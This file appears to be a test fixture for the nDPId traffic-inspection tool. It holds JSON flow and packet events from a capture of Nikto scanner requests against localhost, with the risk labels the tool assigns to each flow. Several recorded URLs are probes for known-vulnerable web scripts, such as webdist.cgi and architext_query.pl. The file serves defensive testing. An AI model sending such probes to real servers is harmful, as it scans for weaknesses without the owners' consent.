{"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/webdist.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001071)"}} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/webdist.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001071)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1576420277538,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1576420277538,"pkt":"AAAAAAAAAAAAAAAACABFAADL1l9AAEAGZct\/AAABfwAAAcXMH5AhiO62DmMqh4AYAED+vwAAAQEICp1m\/kqdZv5KR0VUIC9EQjRXZWIvMTAuMTAuMTAuMTA6MTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/DB4Web\/10.10.10.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001072)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/DB4Web\/10.10.10.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001072)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1576420277540,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277540,"pkt":"AAAAAAAAAAAAAAAACABFAADPftlAAEAGvU1\/AAABfwAAAcXOH5DRSkY\/0jWbSIAYAED+wwAAAQEICp1m\/kydZv5MR0VUIC9ld3MvZXdzL2FyY2hpdGV4dF9xdWVyeS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDczKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ews\/ews\/architext_query.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001073)"}} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ews\/ews\/architext_query.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001073)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1576420277543,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277543,"pkt":"AAAAAAAAAAAAAAAACABFAADI031AAEAGaLB\/AAABfwAAAcXQH5AqpOuTqUte6oAYAED+vAAAAQEICp1m\/k+dZv5OR0VUIC9leGVjL3Nob3cvY29uZmlnL2NyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDc0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/exec\/show\/config\/cr","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001074)"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/exec\/show\/config\/cr","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001074)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1576420277544,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277544,"pkt":"AAAAAAAAAAAAAAAACABFAADPHndAAEAGHbB\/AAABfwAAAcXSH5BxSyag9dSEBYAYAED+wwAAAQEICp1m\/lCdZv5QR0VUIC9pbnN0YW50d2VibWFpbC9tZXNzYWdlLnBocCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA3NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/instantwebmail\/message.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001075)"}} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/instantwebmail\/message.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001075)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1576420277546,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277546,"pkt":"AAAAAAAAAAAAAAAACABFAADZI0FAAEAGGNx\/AAABfwAAAcXUH5D0qBvWdLImZ4AYAED+zQAAAQEICp1m\/lGdZv5RR0VUIC9jZmRvY3Mvc25pcHBldHMvZ2V0dGVtcGRpcmVjdG9yeS5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/snippets\/gettempdirectory.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001076)"}} +01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/snippets\/gettempdirectory.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001076)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1576420277547,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420277547,"pkt":"AAAAAAAAAAAAAAAACABFAADT6e9AAEAGUjN\/AAABfwAAAcXWH5DaBdEHtMEbgIAYAED+xwAAAQEICp1m\/lOdZv5TR0VUIC9kb3N0dWZmLnBocD9hY3Rpb249bW9kaWZ5X3VzZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/dostuff.php?action=modify_user","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001091)"}} +01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/dostuff.php?action=modify_user","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001091)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1576420277549,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277549,"pkt":"AAAAAAAAAAAAAAAACABFAADIKVFAAEAGEt1\/AAABfwAAAcXYH5AE3RGlWDKVx4AYAED+vAAAAQEICp1m\/lWdZv5VR0VUIC9sb2dqYW0vc2hvd2hpdHMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTU3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/logjam\/showhits.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001157)"}} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/logjam\/showhits.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001157)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 